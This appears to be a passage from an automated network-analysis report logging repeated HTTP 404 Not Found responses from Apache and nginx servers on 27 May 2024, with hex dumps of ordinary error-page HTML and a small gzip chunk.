3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:54 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:56 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:22:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i\|rO\|<0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:22:05 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i\|rO\|<0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:22:08 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i\|rO\|<0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:22:11 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 27 May 2024 10:22:39 GMTserver: Apache / ZoneOSlast-modified: Mon, 06 Nov 2023 23:06:18 GMTetag: "1d7b-60983e6d29793"accept-ranges: bytescontent-length: 7547connection: closecontent-type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 38 32 45 32 33 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 3e 2e 63 75 72 72 65 6e 74 2d 75 72 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 34 45 34 45 34 45 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 39 35 39 35 39 35 3b 0a 0a 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 62 74 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 32 35 72 65 6d 3b 0a 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 33 43 33 43 43 3b 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 46 43 46 43 46 43 3b 0a 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 43 46 43 46 43 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 69 63 6f 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 7d 0a 0a 2a 20 7b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 27 May 2024 10:22:42 GMTserver: Apache / ZoneOSlast-modified: Mon, 06 Nov 2023 23:06:18 GMTetag: "1d7b-60983e6d29793"accept-ranges: bytescontent-length: 7547connection: closecontent-type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 38 32 45 32 33 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 3e 2e 63 75 72 72 65 6e 74 2d 75 72 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 34 45 34 45 34 45 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 39 35 39 35 39 35 3b 0a 0a 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 62 74 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 32 35 72 65 6d 3b 0a 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 33 43 33 43 43 3b 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 46 43 46 43 46 43 3b 0a 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 43 46 43 46 43 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 69 63 6f 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 7d 0a 0a 2a 20 7b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 27 May 2024 10:22:44 GMTserver: Apache / ZoneOSlast-modified: Mon, 06 Nov 2023 23:06:18 GMTetag: "1d7b-60983e6d29793"accept-ranges: bytescontent-length: 7547connection: closecontent-type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 38 32 45 32 33 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 3e 2e 63 75 72 72 65 6e 74 2d 75 72 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 34 45 34 45 34 45 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 39 35 39 35 39 35 3b 0a 0a 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 62 74 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 32 35 72 65 6d 3b 0a 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 33 43 33 43 43 3b 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 46 43 46 43 46 43 3b 0a 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 43 46 43 46 43 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 69 63 6f 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 7d 0a 0a 2a 20 7b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 